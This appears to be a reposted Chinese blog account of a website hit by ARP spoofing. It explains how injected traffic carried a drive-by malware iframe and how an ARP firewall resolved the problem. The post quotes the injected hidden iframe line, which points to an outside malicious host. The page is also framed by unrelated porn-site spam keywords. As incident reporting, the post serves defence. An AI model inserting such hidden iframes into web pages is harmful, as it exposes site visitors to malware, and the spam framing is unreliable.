成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

服務器被ARP攻擊,網站被掛馬

安全 黑客攻防
今天凌晨一打開自己的網站,卡巴就彈出來說有病毒,報告為“惡意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”,然后網頁顯示的也有問題,最上方居然裸露出來了一小段源碼,于是馬上查看源碼,發現代碼居然被改了.

今天凌晨一打開自己的網站,卡巴就彈出來說有病毒,報告為“惡意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”,然后網頁顯示的也有問題,最上方居然裸露出來了一小段源碼,于是馬上查看源碼,發現代碼居然被改了.

最上面變成了:

〈IFRAME height=0 src="httP://web.21575.com/113/" width=150〉〈/IFRAME〉

我的第一反應就是網站被人掛馬了,首先想到的是不是程序有漏洞,被人傳了木馬,趕緊用FTP連上,檢查ASP文件,發現所有的ASP文件都沒有是今天修改過的,模板系統也沒有問題,這下我真的不知道怎么辦了。都搞不清楚問題出在哪里。。。
然后我對掛馬的這個網站來了興趣,在百度里一搜“21575”,

http://www.baidu.com/s?word=domain:21575&ie=gb2312&ct=0

發現有一條的結果的標題是“服務器被ARP欺騙,大家請不要訪問我的站”,看了一下那條帖子,然后又聯想到昨天下午收到了IDC的短信,提醒說最近ARP病毒泛濫,于是我馬上就想到應該是受到ARP攻擊了。
下午我還去IDC的網站上看了一下,有一篇關于防范ARP攻擊的公告,還提供了ARP防范工具下載,趕緊下了,然后安裝.
 這個軟件是ARP防火墻(Anti ARP Sniffer),下載地址:http://www.antiarp.com/newsopen2.asp?ArticleID=24

官網:http://www.antiarp.com

剛裝上以后ARP防火墻啟動不了,于是重啟服務器,順利啟動了,然后就看到ARP防火墻提示受到ARP攻擊了,還能跟蹤到攻擊的來源IP
裝上ARP防火墻以后,再訪問網站,一切正常.

ARP攻擊的先進性就好比DNS劫持一樣,處于最上層。網頁實際的文件并沒有改變,但是發送給瀏覽器以后就變了樣了,被病毒給改了.

相關知識:

ARP即Address Resolution Protocol,將網絡IP地址映射至網卡硬件MAC地址的協議。一般危害為欺騙同網段內的其他服務器地址,截獲其數據報文、監聽數據傳輸、盜取帳號信息,甚至對來訪數據包進行欺騙和偽造。

該病毒發作方式為:網段內一臺服務器中此病毒,病毒將以此機器作為肉雞,對同網段服務器進行數據劫持和欺騙。類似于奪取同段內的其他服務器的IP,導致合法服務器無法正常通訊。此病毒還可對網關地址進行欺騙,造成此網段所有IP地址都無法正常解析。以致網絡大面積癱瘓。

我這次的情形就是上面說的“對來訪數據包進行欺騙和偽造”、“對同網段服務器進行數據劫持和欺騙”,ARP防火墻查到了攻擊源,是同網段內的一臺機子,我看了一下那臺機子,居然是用IIS的默認站點建的站(可以直接用IP訪問),估計系統漏洞不少,被人攻擊中毒了,然后連累到我們同網段內的其他無辜的用戶。

安全很重要!尤其是在最近病毒木馬泛濫的日子里。

 

【編輯推薦】

  1. 代理ARP 技術(頁1)
  2. 專題:ARP攻擊防范與解決方案
責任編輯:Oo小孩兒 來源: zenghuijun.com
相關推薦

2011-06-09 11:24:42

2011-06-09 13:26:27

2011-06-09 12:50:47

2009-02-27 15:04:00

2009-05-25 10:59:14

2009-06-02 09:09:36

2009-02-03 15:37:50

2013-05-22 15:45:43

2010-03-26 19:19:02

2009-03-24 09:24:54

2009-04-28 13:18:42

卡飯社區惡意代碼金山毒霸

2009-08-03 10:29:02

2009-06-01 13:58:17

網站掛馬金山毒霸

2009-08-21 08:46:41

2009-08-27 10:06:49

2021-01-25 10:45:10

DDoSRDP服務器Windows

2009-02-03 11:49:14

2009-01-23 11:45:59

2009-08-10 16:20:13

2021-07-28 14:35:54

區塊鏈服務器DDoS
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: a在线免费观看视频 | 一区二区三区在线播放视频 | 国产精品视频久久久 | 在线日韩精品视频 | 国产日韩一区二区 | 精品一区二区三区不卡 | 91视频大全| 91亚洲精品久久久电影 | 成人在线免费观看 | 本道综合精品 | 欧美日韩国产在线观看 | 美日韩精品 | 欧美性生交大片免费 | 特级丰满少妇一级aaaa爱毛片 | 久久久久一区二区三区四区 | 欧美激情a∨在线视频播放 成人免费共享视频 | 在线视频91 | 日韩久久综合 | 中文字幕在线剧情 | 精品一区二区免费视频 | 亚洲精品乱码久久久久久9色 | 精品久久久久国产 | 国产高清精品一区 | 色偷偷噜噜噜亚洲男人 | 91传媒在线观看 | 国产精品99久久久久久动医院 | 国产精品亚洲成在人线 | 国产精品1区2区3区 中文字幕一区二区三区四区 | 毛片在线视频 | 国产亚洲精品久久久久动 | 黄色网址免费在线观看 | 一级做a爰片性色毛片 | 欧美午夜一区二区三区免费大片 | 毛片一区二区三区 | 97超在线视频 | 日日夜夜精品视频 | 最新国产精品视频 | 亚洲成人黄色 | 午夜一级做a爰片久久毛片 精品综合 | 激情福利视频 | 在线观看免费av网 |